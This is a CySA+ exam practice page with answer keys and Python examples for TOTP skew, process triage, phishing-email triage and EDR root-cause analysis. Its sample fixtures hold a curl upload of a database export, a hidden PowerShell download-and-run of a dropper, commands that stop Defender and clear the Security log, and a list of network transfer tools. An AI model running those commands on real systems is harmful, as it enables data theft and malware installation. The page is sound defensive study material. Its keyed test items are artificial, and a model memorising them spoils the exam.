CompTIA CS0-003 Online Practice Questions and Exam Preparation
CS0-003 Exam Details
Exam Code
:CS0-003
Exam Name
:CompTIA Cybersecurity Analyst (CySA+)
Certification
:CompTIA Certifications
Vendor
:CompTIA
Total Questions
:680 Q&As
Last Updated
:May 25, 2026
CompTIA CS0-003 Online Questions & Answers
Question 581:
Which of the following will most likely cause severe issues with authentication and logging?
A. Virtualization B. Multifactor authentication C. Federation D. Time synchronization
D. Time synchronization
Explanation
Time synchronization failures break two things at once. Logging: when clocks drift between hosts, timestamps no longer line up, so events from different systems cannot be correlated into one timeline and the order of an attacker's actions becomes ambiguous. Authentication: protocols that embed time in their credentials reject otherwise valid ones once the skew exceeds their tolerance. Kerberos rejects tickets when the client and KDC differ by more than the configured maximum skew (five minutes by default), TOTP codes used for multifactor authentication are valid only for a 30-second step plus whatever small window the server allows, and certificate and token expiry checks also depend on an accurate clock. The practical control is to point every system at the same trusted NTP source and alert when drift exceeds a few seconds. Virtualization, multifactor authentication and federation each bring their own problems, but none breaks authentication and logging across the board the way clock drift does.
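To make the authentication half of this concrete, here is an added example (not part of the exam material) that implements RFC 6238 TOTP in plain Python and shows how a skewed client clock pushes an otherwise correct code outside the server's acceptance window. The secret is the RFC test-vector key; the server time of 1,700,000,000 and the one-step acceptance window are assumed values chosen for the demonstration.

```python
import hashlib
import hmac
import struct

STEP = 30        # RFC 6238 time step in seconds
DIGITS = 6
WINDOW = 1       # assumption: server accepts the current step plus one step either side

# RFC 4226 / RFC 6238 test-vector secret; a demo value, not a real key.
SECRET = b"12345678901234567890"


def totp_counter(unix_time: int, step: int = STEP) -> int:
    """Number of whole time steps since the Unix epoch."""
    return unix_time // step


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, unix_time: int) -> str:
    """RFC 6238 TOTP: HOTP keyed by the time-step counter."""
    return hotp(secret, totp_counter(unix_time))


def verify(secret: bytes, code: str, server_time: int, window: int = WINDOW) -> bool:
    """Accept the code if it matches any step within +/- window of the server's clock."""
    base = totp_counter(server_time)
    return any(
        hmac.compare_digest(hotp(secret, base + d), code)
        for d in range(-window, window + 1)
    )


def skew_outcome(skew_seconds: int, server_time: int = 1_700_000_000) -> bool:
    """The client's clock is off by skew_seconds; does the server accept the client's code?"""
    client_code = totp(SECRET, server_time + skew_seconds)
    return verify(SECRET, client_code, server_time)


if __name__ == "__main__":
    for skew in (0, 25, -25, -90, 120):
        print(f"skew {skew:+5d}s -> {'accepted' if skew_outcome(skew) else 'REJECTED'}")
```

With a one-step window the server tolerates somewhere between 30 and 59 seconds of drift, depending on where in the step its own clock sits; past that, every code the user types is rejected even though the shared secret is correct, which looks like a credential problem to the user and like a brute-force attempt in the logs. Widening the window buys tolerance at the price of a larger replay surface; keeping clocks synchronized with NTP is the actual fix.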
Question 582:
An organization wants to implement an identity and access management technology that is resistant to phishing attacks.
Which of the following is the best technology to implement?
A. Federation B. Privileged access management C. Passwordless authentication D. Single sign-on
C. Passwordless authentication
Question 583:
Which of the following should be performed first when creating a BCP to ensure that all critical functions and financial implications have been considered?
A. Failover test B. Tabletop exercise C. Security policies D. Business impact analysis
D. Business impact analysis
Question 584:
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with.
Which of the following is the best mitigation technique?
A. Geoblock the offending source country. B. Block the IP range of the scans at the network firewall. C. Perform a historical trend analysis and look for similar scanning activity. D. Block the specific IP address of the scans at the network firewall.
A. Geoblock the offending source country.
Explanation
Geoblocking is the expected answer: the scans originate from a country the company has no business with, so blocking that country's address space at the perimeter removes the whole source rather than one address. Geoblocking restricts access based on geographic location, in practice by dropping traffic from the IP ranges a GeoIP database attributes to a country or region, which shrinks the attack surface exposed to that source. Blocking the single scanning IP (D) or its range (B) stops only that source, and a scanner simply moves to another address; a historical trend analysis (C) is investigation, not mitigation. Two caveats before relying on it: GeoIP attribution is imperfect and a determined attacker routes through VPNs, cloud providers or compromised hosts in permitted countries, so treat geoblocking as noise reduction rather than a hard boundary; and log what the rule drops and carve out exceptions, or travelling staff, CDNs and third-party services in that region will be blocked as well.
References:
https://www.blumira.com/geoblocking/
Question 585:
An IT professional is reviewing the output from the top command in Linux. In this company, only IT and security staff are allowed to have elevated privileges.
Both departments have confirmed they are not working on anything that requires elevated privileges. Based on the output below:
Which of the following PIDs is most likely to contribute to data exfiltration?
A. 2264 B. 34218 C. 34834 D. 35963
A. 2264
Explanation
PID 2264 (bash running as root) is the most likely candidate: the policy allows elevated privileges only to IT and security staff, and both have confirmed they are not using them, so an interactive root shell has no legitimate owner and is exactly the foothold used to collect and transfer data.
Why Not Other Options?
B (34218 - Xorg): Xorg is the display server for the GUI; no sign of exfiltration.
C (34834 - Cinnamon): Cinnamon is a desktop environment, not a threat.
D (35963 - xrdp): xrdp is a remote desktop service; expected behavior on a host that offers RDP.
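The exam's `top` output is not reproduced on this page, so the following is an added example (not part of the original question) that applies the same reasoning to a constructed `ps -eo pid,user,comm,args` listing: it flags privileged processes that are either interactive shells or tools capable of moving data off the host. The sample listing, the set of privileged users and the tool lists are assumptions for the demonstration.

```python
from dataclasses import dataclass

# Constructed sample in `ps -eo pid,user,comm,args` layout; NOT the exam's output,
# which is not reproduced on the page. Addresses are documentation ranges.
SAMPLE_PS = """\
  PID USER     COMMAND   ARGS
    1 root     systemd   /sbin/init
 2264 root     bash      bash
34218 root     Xorg      /usr/lib/xorg/Xorg :0 -auth /var/run/lightdm/root/:0
34834 alice    cinnamon  cinnamon --replace
35963 xrdp     xrdp      /usr/sbin/xrdp
36102 root     curl      curl -T /srv/db/export.sql https://203.0.113.9/upload
36211 bob      ssh       ssh bob@fileserver.corp.example
"""

# Assumed heuristics: a privileged interactive shell, or a privileged copy of a
# network transfer tool, is the process most able to stage and exfiltrate data.
INTERACTIVE_SHELLS = {"bash", "sh", "zsh", "dash", "fish"}
TRANSFER_TOOLS = {"curl", "wget", "scp", "sftp", "nc", "ncat", "socat", "rsync", "ssh"}


@dataclass
class Proc:
    pid: int
    user: str
    comm: str
    args: str


def parse_ps(text: str) -> list[Proc]:
    """Parse `ps -eo pid,user,comm,args` output, skipping the header row."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3 or parts[0] == "PID":
            continue
        pid, user, comm = parts[:3]
        args = parts[3] if len(parts) == 4 else ""
        procs.append(Proc(int(pid), user, comm, args))
    return procs


def flag_exfil_candidates(procs, privileged_users=frozenset({"root"})):
    """Return (pid, reason) for privileged processes that can collect or move data."""
    findings = []
    for p in procs:
        if p.user not in privileged_users:
            continue
        if p.comm in INTERACTIVE_SHELLS:
            findings.append((p.pid, f"interactive shell running as {p.user}"))
        elif p.comm in TRANSFER_TOOLS:
            findings.append((p.pid, f"{p.comm} running as {p.user}: {p.args}"))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_exfil_candidates(parse_ps(SAMPLE_PS)):
        print(f"PID {pid}: {reason}")
```

Xorg, the desktop session and xrdp are owned by the expected accounts or are not data-moving tools, so they are not flagged; the root shell is, and so is a root-owned `curl` upload that a real listing would also expose. On a live host, follow a hit with `ls -l /proc/<pid>/cwd`, `ss -tnp` and the process's parent chain before acting.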
Question 586:
A security analyst is implementing a process to perform vulnerability management on an environment:
1. Systems must remain on an isolated network.
2. The process should focus on external threats.
3. No additional software can be deployed on the systems.
4. Transmitted packets cannot be modified or dropped.
5. Additional processing delays are not tolerated.
Which of the following is the best way to securely meet the requirements?
A. Implement agentless sensors at the network edge. B. Use reverse engineering to detect flaws on the in-scope systems. C. Deploy an IPS In-line with the network traffic. D. Check the compatibility of an EDR agent with the OSs used on the environment.
A. Implement agentless sensors at the network edge.
Explanation
Community most-voted answer: D, which differs from the listed key (A). The requirements favour A: checking EDR agent compatibility (D) still ends with an agent installed on the systems, which requirement 3 forbids; an in-line IPS (C) can drop or delay packets, contradicting requirements 4 and 5; reverse engineering the in-scope systems (B) does not address external threats. A passive, agentless sensor at the network edge (A) observes traffic to and from the isolated network without installing software or altering packets.
Question 587:
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted.
Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
A. Interview the users who access these systems. B. Scan the systems to see which vulnerabilities currently exist. C. Configure alerts for vendor-specific zero-day exploits. D. Determine the asset value of each system.
D. Determine the asset value of each system.
Explanation
Determining the asset value of each system is the best action to perform first, as it helps to categorize and prioritize the systems based on the sensitivity of the data they host. The asset value is a measure of how important a system is to the organization, in terms of its financial, operational, or reputational impact. The asset value can help the security analyst to assign a risk level and a protection level to each system, and to allocate resources accordingly. The other actions are not as effective as determining the asset value, as they do not directly address the goal of promoting confidentiality, availability, and integrity of the data.
Interviewing the users who access these systems may provide some insight into how the systems are used and what data they contain, but it may not reflect the actual value or sensitivity of the data from an organizational perspective.
Scanning the systems to see which vulnerabilities currently exist may help to identify and remediate some security issues, but it does not help to categorize or prioritize the systems based on their data sensitivity. Configuring alerts for vendor-specific zero-day exploits may help to detect and respond to some emerging threats, but it does not help to protect the systems based on their data sensitivity.
Question 588:
Which of the following security operations tasks are ideal for automation?
A. Suspicious file analysis: look for suspicious-looking graphics in a folder; create subfolders in the original folder based on the category of graphics found; move the suspicious graphics to the appropriate subfolder.
B. Firewall IoC block actions: examine the firewall logs for IoCs from the most recently published zero-day exploit; take mitigating actions in the firewall to block the behavior found in the logs; follow up on any false positives caused by the block rules.
C. Security application user errors: search the error logs for signs of users having trouble with the security application; look up the user's phone number; call the user to help with any questions about using the application.
D. Email header analysis: check the email header for a phishing confidence metric greater than or equal to five; add the domain of the sender to the block list; move the email to quarantine.
D. Email header analysis: check the email header for a phishing confidence metric greater than or equal to five; add the domain of the sender to the block list; move the email to quarantine.
Explanation
Email header analysis is the task best suited to automation: its inputs are structured (the header fields and a numeric phishing-confidence score), the decision is a fixed threshold (a score of five or more), and the resulting actions (add the sender's domain to the block list, move the message to quarantine) are deterministic and reversible. A script or SOAR playbook can parse the headers and apply the rule without human judgement. The other options each hinge on a step a machine cannot reliably take: judging which graphics look suspicious (A), deciding which blocked connections were false positives (B), and telephoning a user (C). One caveat when automating D: never let the rule block your own domains, or a spoofed internal sender with a high score will cut off legitimate mail.
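Here is an added example (not from the exam material) of option D as a runnable triage step: it parses a message with Python's `email` module, reads a gateway-supplied confidence header, and applies the threshold, blocklist and quarantine rule. The header name `X-Phishing-Confidence`, the protected domain `example.org` and the three sample messages are assumptions constructed for the demonstration; real gateways use their own header names.

```python
from email import message_from_string
from email.utils import parseaddr

PHISH_THRESHOLD = 5
# Assumption: header name varies by mail gateway; set it to what yours emits.
CONFIDENCE_HEADER = "X-Phishing-Confidence"
# Domains the rule must never blocklist, or a spoofed internal sender would cut off our own mail.
PROTECTED_DOMAINS = {"example.org"}

# Constructed sample messages; none of these are real mail.
PHISH_MSG = """\
Return-Path: <billing@paypa1-secure.example>
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=paypa1-secure.example
X-Phishing-Confidence: 7
From: "PayPal Billing" <billing@paypa1-secure.example>
To: alice@example.org
Subject: Action required: account suspended

Click here to restore access.
"""

NEWSLETTER_MSG = """\
X-Phishing-Confidence: 2
From: news@vendor.example
To: alice@example.org
Subject: March product update

Nothing to see here.
"""

SPOOFED_INTERNAL_MSG = """\
X-Phishing-Confidence: 9
From: "CEO" <ceo@example.org>
To: alice@example.org
Subject: Urgent wire transfer

Please handle today.
"""


def sender_domain(msg) -> str:
    """Domain of the RFC 5322 From address, lower-cased; empty string if absent."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def phishing_confidence(msg) -> int:
    """Integer score from the gateway header; a missing or unparsable header scores 0."""
    try:
        return int(msg.get(CONFIDENCE_HEADER, "0").strip())
    except ValueError:
        return 0


def triage(raw_message: str, blocklist: set) -> dict:
    """Option D: score >= threshold -> blocklist the sender domain and quarantine."""
    msg = message_from_string(raw_message)
    score = phishing_confidence(msg)
    domain = sender_domain(msg)
    if score < PHISH_THRESHOLD:
        return {"action": "deliver", "score": score, "domain": domain, "blocklisted": False}
    blocklisted = bool(domain) and domain not in PROTECTED_DOMAINS
    if blocklisted:
        blocklist.add(domain)
    return {"action": "quarantine", "score": score, "domain": domain, "blocklisted": blocklisted}


def triage_batch(raw_messages) -> tuple[list, set]:
    """Run the rule over a batch and return (decisions, resulting blocklist)."""
    blocklist: set = set()
    return [triage(raw, blocklist) for raw in raw_messages], blocklist


if __name__ == "__main__":
    decisions, blocked = triage_batch([PHISH_MSG, NEWSLETTER_MSG, SPOOFED_INTERNAL_MSG])
    for d in decisions:
        print(d)
    print("blocklist:", sorted(blocked))
```

The spoofed internal message is still quarantined, but its domain is not added to the blocklist; that is the guard the explanation above warns about. A production version would additionally require the message to have passed through your gateway (so the score cannot be forged by the sender) before trusting the header.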
Question 589:
A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improve security.
Which of the following systems should the analyst remediate first?
A. Computer1 B. Server1 C. Computer2 D. Server2
B. Server1
Explanation
Community most-voted answer: C, which differs from the listed key (B).
Question 590:
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of the initial dropper and removal of event log entries and prefetch files from the host.
Which of the following data sources would most likely reveal evidence of the root cause?
(Select two).
A. Creation time of dropper B. Registry artifacts C. EDR data D. Prefetch files E. File system metadata F. Sysmon event log
B. Registry artifacts C. EDR data
Explanation
Registry artifacts: the registry records the configuration changes the malware made to disable host security services (service start values, policy keys) and any persistence it set (Run keys, scheduled-task or service entries); those changes remain after the dropper deletes itself.
EDR data: Endpoint Detection and Response telemetry (process creation, file modifications, network connections, service control) is streamed to a central console as it happens, so it survives the malware's clean-up routines on the host and shows what launched the dropper and what it did afterwards.
The sources the malware deliberately destroyed are poor choices: the Windows and Sysmon event log entries and the prefetch files (D, F) were deleted, and the dropper's creation time (A) disappeared with the dropper. File system metadata (E) can hint at deletions but not at what ran. Together, registry artifacts and EDR data are the sources most likely to show how the malware arrived and what it did to achieve its objectives.
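To show why off-host EDR telemetry survives the clean-up, here is an added example (not from the exam material) that reconstructs the process tree from a constructed stream of EDR process-creation events, locates the anti-forensic commands, and walks their ancestry back to the process that introduced the malware. The event format, paths, the `203.0.113.7` address and the baseline-process list are all assumptions for the demonstration; Sysmon Event ID 1 and vendor EDR feeds carry the same pid/ppid/image/command-line fields.

```python
import json
import re

# Constructed EDR process-creation telemetry as JSON lines; an illustration only,
# not real vendor output. Backslashes are doubled because the text is JSON.
EDR_EVENTS = r"""
{"ts":"2024-03-01T09:13:40Z","pid":812,"ppid":600,"image":"C:\\Windows\\explorer.exe","cmd":"explorer.exe"}
{"ts":"2024-03-01T09:14:02Z","pid":4120,"ppid":812,"image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","cmd":"WINWORD.EXE /n invoice.docm"}
{"ts":"2024-03-01T09:14:09Z","pid":4388,"ppid":4120,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -w hidden -c iwr http://203.0.113.7/d.exe -OutFile $env:TEMP\\d.exe; Start-Process $env:TEMP\\d.exe"}
{"ts":"2024-03-01T09:14:15Z","pid":5012,"ppid":4388,"image":"C:\\Users\\alice\\AppData\\Local\\Temp\\d.exe","cmd":"d.exe"}
{"ts":"2024-03-01T09:14:16Z","pid":5044,"ppid":5012,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c sc stop WinDefend"}
{"ts":"2024-03-01T09:14:17Z","pid":5060,"ppid":5012,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c wevtutil cl Security"}
{"ts":"2024-03-01T09:14:18Z","pid":5072,"ppid":5012,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c del /f /q %TEMP%\\d.exe"}
"""

# Assumed: command-line patterns that match the behaviour described in the question.
CLEANUP_PATTERNS = [
    (r"\bsc(\.exe)?\s+stop\b", "stops a service (host security disabled)"),
    (r"\bwevtutil(\.exe)?\s+cl\b", "clears an event log"),
    (r"\bdel\b.*\.exe", "deletes an executable (dropper removed)"),
]
# Assumed: long-lived system processes that are never the root cause themselves.
BASELINE = {"explorer.exe", "services.exe", "svchost.exe", "wininit.exe", "userinit.exe"}


def load_events() -> list[dict]:
    return [json.loads(line) for line in EDR_EVENTS.strip().splitlines() if line.strip()]


def index_by_pid(events) -> dict:
    return {e["pid"]: e for e in events}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def ancestry(by_pid: dict, pid: int) -> list[dict]:
    """Follow ppid links to the topmost process we have telemetry for; root first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def cleanup_events(events) -> list[tuple[int, str]]:
    """(pid, label) for every event whose command line matches an anti-forensic pattern."""
    hits = []
    for e in events:
        for pattern, label in CLEANUP_PATTERNS:
            if re.search(pattern, e["cmd"], re.IGNORECASE):
                hits.append((e["pid"], label))
                break
    return hits


def root_cause(by_pid: dict, pid: int):
    """The first ancestor that is not a baseline system process: what introduced the malware."""
    for e in ancestry(by_pid, pid):
        if basename(e["image"]).lower() not in BASELINE:
            return e
    return None


if __name__ == "__main__":
    events = load_events()
    by_pid = index_by_pid(events)
    for pid, label in cleanup_events(events):
        origin = root_cause(by_pid, pid)
        chain = " -> ".join(basename(e["image"]) for e in ancestry(by_pid, pid))
        print(f"pid {pid}: {label}\n   chain: {chain}\n   root cause: pid {origin['pid']} {origin['cmd']}")
```

Every clean-up command traces back to the same origin, the Word process that opened `invoice.docm`; the dropper and the cleared Security log are gone from the host, but the telemetry that recorded their creation was already off the box. The same walk works over Sysmon Event ID 1 records when they have been forwarded to a collector before the local log was cleared.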